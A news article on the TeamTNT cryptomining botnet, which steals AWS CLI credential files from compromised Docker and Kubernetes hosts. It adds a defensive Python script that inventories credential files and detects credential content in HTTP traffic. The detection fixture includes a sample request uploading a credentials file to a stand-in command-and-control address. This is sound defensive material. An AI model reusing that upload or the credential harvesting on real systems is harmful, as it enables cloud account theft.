Cryptomining Botnet Steals AWS Credentials

A crypto-mining botnet is stealing Amazon Web Services credentials from infected servers.

The TeamTNT botnet targets misconfigured Docker and Kubernetes systems running on top of AWS servers, and then scans the underlying infected servers for any hard-coded AWS credentials, security firm Cado Security said. The malware, which installs Monero cryptominers on the infected systems, has been actively targeting Docker installations since April, according to Trend Micro.

The research team used MoneroOcean, one of the mining pools used by the attackers, to compile a list of 119 compromised systems across AWS, Kubernetes clusters, and Jenkins build servers.

The botnet scans for open and accessible Docker and Kubernetes systems and infects them with malware. Once on a system, the bot looks for exposed AWS credentials on the underlying host. In this case, it is looking for the ~/.aws/credentials and ~/.aws/config files, where the AWS Command Line Interface (CLI) stores credentials and configuration details unencrypted. Once found, the files are copied and uploaded to the attacker’s command-and-control server using curl.

“The code to steal AWS credentials is relatively straightforward – on execution it uploads the default AWS credentials and config files to the attackers’ server,” Cado Security said.

Once the infrastructure has been compromised, the bot sets up its own containers to mine Monero cryptocurrency and to scan for additional Docker and Kubernetes servers. The attackers install a number of other malicious tools as well, including an SSH post-exploitation script called punk.py, a log cleaning tool, the Diamorphine rootkit, and the Tsunami IRC backdoor.

These kinds of cryptojacking attacks are particularly expensive for organizations, as attackers are taking advantage of their infrastructure’s processing resources to mine for cryptocurrencies.

Researchers sent credentials created by CanaryTokens.org to the command-and-control server, but said they have not yet seen those credentials in use. Many of the stolen credentials appear not to have been used as of Aug. 17, but that doesn’t mean they never will be. The attackers may be using them manually and slowly, reselling them on the black market, or still working out how to automate their use.

“Whilst these attacks aren’t particularly sophisticated, the numerous groups out there deploying cryptojacking worms are successful at infecting large amounts of business systems,” Cado Security said.

Crypto-mining campaigns frequently borrow techniques and code from each other. In this case, TeamTNT copied code from another worm called Kinsing. Cado Security said other worms could start stealing AWS credentials, as well.

“It is likely we will see other worms start to copy the ability to steal AWS Credentials files too,” Cado Security said.

While there have been a number of malware campaigns targeting Docker and Kubernetes systems, and attacks looking for hard-coded or forgotten credentials, this AWS-specific functionality is new, said Cado Security. Firewall rules can limit access to the Docker API, and it is safer to whitelist only the specific systems that need access than to leave the API reachable from anywhere. Network administrators should also review network traffic for signs that credential files are being transferred over HTTP. Businesses should identify which systems are storing AWS credential files and delete them if they aren’t in use.
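The two checks above (find AWS credential files left on hosts, and spot their contents in outbound HTTP traffic) as an added example. This is not code from the article, from Cado Security or from TeamTNT; it assumes only the standard AWS CLI layout (~/.aws/credentials and ~/.aws/config, INI format). The directory tree, file contents and HTTP request body are constructed sample data, the access key IDs are the placeholder values from the AWS documentation, and the C2 address is a TEST-NET address.

```python
# Added example, not code from the article, Cado Security or TeamTNT.
# Assumes the standard AWS CLI file layout; all sample data below is constructed.
import configparser
import os
import re
import stat
import tempfile
from pathlib import Path

# The two files the worm copies: the CLI writes long-lived keys to them in plaintext.
AWS_CLI_FILES = ("credentials", "config")

# Access key IDs are 20 uppercase alphanumerics: AKIA for long-lived IAM user keys,
# ASIA for temporary STS keys. The ID is an identifier, not the secret, so it is
# safe to report and is what you correlate with IAM and CloudTrail.
ACCESS_KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")

# Option names the CLI writes; any of them in an outbound HTTP body is a strong
# sign a credentials file is being uploaded.
CREDENTIAL_LINE_RE = re.compile(
    r"^\s*aws_(access_key_id|secret_access_key|session_token)\s*=", re.M | re.I
)


def inventory_credential_files(root: Path) -> list:
    """Walk `root` for .aws/credentials and .aws/config files.

    One record per file: path, profile names, access key IDs (never the secrets)
    and whether group/other can read it, which is a finding on its own.
    """
    records = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if Path(dirpath).name != ".aws":
            continue
        for name in filenames:
            if name not in AWS_CLI_FILES:
                continue
            path = Path(dirpath) / name
            # interpolation=None: secret keys may legitimately contain '%'.
            parser = configparser.ConfigParser(interpolation=None)
            parser.read(path)
            key_ids = [
                parser[section]["aws_access_key_id"]
                for section in parser.sections()
                if "aws_access_key_id" in parser[section]
            ]
            mode = path.stat().st_mode
            records.append({
                "path": str(path),
                "profiles": parser.sections(),
                "key_ids": key_ids,
                "group_or_world_readable": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
            })
    return records


def credential_material_in_payload(body: str) -> dict:
    """Flag an HTTP request body that carries AWS CLI credential-file content.

    Counts CLI option lines and collects the access key IDs seen, so a raw file
    upload (the curl upload the article describes) and a reformatted dump are
    both caught.
    """
    return {
        "credential_lines": len(CREDENTIAL_LINE_RE.findall(body)),
        "access_key_ids": sorted(set(ACCESS_KEY_ID_RE.findall(body))),
    }


# --- constructed sample data (placeholder keys from the AWS documentation) ---
SAMPLE_CREDENTIALS = """\
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

[dev]
aws_access_key_id = AKIAI44QH8DHBEXAMPLE
aws_secret_access_key = je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY
"""

SAMPLE_CONFIG = "[default]\nregion = us-east-1\noutput = json\n\n[profile dev]\nregion = eu-west-1\n"

# A multipart upload of the credentials file to a hypothetical C2 (TEST-NET address).
SAMPLE_HTTP_BODY = (
    "POST /upload HTTP/1.1\r\nHost: 203.0.113.10\r\n"
    "Content-Type: multipart/form-data; boundary=X\r\n\r\n"
    '--X\r\nContent-Disposition: form-data; name="file"; filename="credentials"\r\n\r\n'
    + SAMPLE_CREDENTIALS + "\r\n--X--\r\n"
)


def build_sample_tree() -> Path:
    """Two home directories: 'deploy' has keys left behind, 'ci' has only config."""
    root = Path(tempfile.mkdtemp(prefix="awscred-demo-"))
    deploy = root / "home" / "deploy" / ".aws"
    deploy.mkdir(parents=True)
    (deploy / "credentials").write_text(SAMPLE_CREDENTIALS)
    (deploy / "credentials").chmod(0o644)  # sloppy: readable by every local user
    (deploy / "config").write_text(SAMPLE_CONFIG)
    ci = root / "home" / "ci" / ".aws"
    ci.mkdir(parents=True)
    (ci / "config").write_text(SAMPLE_CONFIG)
    return root


if __name__ == "__main__":
    for record in inventory_credential_files(build_sample_tree()):
        print(record)
    print(credential_material_in_payload(SAMPLE_HTTP_BODY))
```

On a real host, point inventory_credential_files at /home and /root and match the reported key IDs against the IAM users that own them (aws iam list-access-keys) and against CloudTrail, so that a key found on a build box or a production container can be rotated or deleted rather than left for the next worm. For the traffic side, feed credential_material_in_payload decoded HTTP request bodies from a proxy or IDS; since the upload the article describes is plain HTTP, the option names and key IDs are visible on the wire.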

“It’s common to find development credentials have accidentally been left on production systems,” Cado Security said.